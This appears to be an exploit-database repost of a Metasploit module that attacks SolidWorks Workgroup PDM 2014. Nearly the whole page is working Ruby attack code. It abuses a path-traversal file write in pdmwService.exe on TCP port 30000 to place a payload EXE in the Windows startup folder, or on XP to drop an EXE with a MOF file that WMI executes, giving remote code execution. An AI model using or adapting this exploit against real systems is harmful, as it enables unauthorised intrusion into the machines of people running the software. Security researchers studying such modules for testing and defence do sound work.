SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write Exploit

2014-03-10T00:00:00
ID 1337DAY-ID-21997
Type zdt
Reporter metasploit
Modified 2014-03-10T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write',
      'Description'    => %q{
        This module exploits a remote arbitrary file write vulnerability in
        SolidWorks Workgroup PDM 2014 SP2 and prior.
 
        For targets running Windows Vista or newer the payload is written to the
        startup folder for all users and executed upon next user logon.
 
        For targets before Windows Vista code execution can be achieved by first
        uploading the payload as an exe file, and then upload another mof file,
        which schedules WMI to execute the uploaded payload.
 
        This module has been tested successfully on SolidWorks Workgroup PDM
        2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mohamed Shetta <mshetta[at]live.com>', # Initial discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>',  # Metasploit
        ],
      'References'     =>
        [
          ['EDB',   '31831'],
          ['OSVDB', '103671']
        ],
      'Payload'        =>
        {
          'BadChars'   => "\x00"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested on:
          # - SolidWorks Workgroup PDM 2011 SP0 (Windows XP SP3 - EN)
          # - SolidWorks Workgroup PDM 2011 SP0 (Windows 7 SP1 - EN)
          ['Automatic', { 'auto' => true } ], # both
          ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)', {}],
          ['SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)', {}],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Feb 22 2014',
      'DefaultTarget'  => 0))
 
    register_options([
      OptInt.new('DEPTH', [true, 'Traversal depth', 10]),
      Opt::RPORT(30000)
    ], self.class)
  end
 
  def peer
    "#{rhost}:#{rport}"
  end
 
  #
  # Check
  #
  def check
    # op code
    req  = "\xD0\x07\x00\x00"
    # filename length
    req << "\x00\x00\x00\x00"
    # data length
    req << "\x00\x00\x00\x00"
    connect
    sock.put req
    res = sock.get_once
    disconnect
    if !res
      vprint_error "#{peer} - Connection failed."
      Exploit::CheckCode::Unknown
    elsif res == "\x00\x00\x00\x00"
      vprint_status "#{peer} - Received reply (#{res.length} bytes)"
      Exploit::CheckCode::Detected
    else
      vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
      Exploit::CheckCode::Safe
    end
  end
 
  #
  # Send a file
  #
  def upload(fname, data)
    # every character in the filename must be followed by 0x00
    fname = fname.scan(/./).join("\x00") + "\x00"
    # op code
    req  = "\xD0\x07\x00\x00"
    # filename length
    req << "#{[fname.length].pack('l')}"
    # file name
    req << "#{fname}"
    # data length
    req << "#{[data.length].pack('l')}"
    # data
    req << "#{data}"
    connect
    sock.put req
    res = sock.get_once
    disconnect
    if !res
      fail_with(Failure::Unknown, "#{peer} - Connection failed.")
    elsif res == "\x00\x00\x00\x00"
      print_status "#{peer} - Received reply (#{res.length} bytes)"
    else
      print_warning "#{peer} - Unexpected reply (#{res.length} bytes)"
    end
  end
 
  #
  # Exploit
  #
  def exploit
    depth    = '..\\' * datastore['DEPTH']
    exe      = generate_payload_exe
    exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe"
    if target.name =~ /Automatic/ or target.name =~ /Vista/
      print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)")
      upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe)
    end
    if target.name =~ /Automatic/ or target.name =~ /XP/
      print_status("#{peer} - Sending EXE (#{exe.length} bytes)")
      upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe)
      mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof"
      mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
      print_status("#{peer} - Sending MOF (#{mof.length} bytes)")
      upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
      register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
    end
    register_file_for_cleanup("#{::File.basename(exe_name)}")
  end
end

#  0day.today [2016-04-19]  #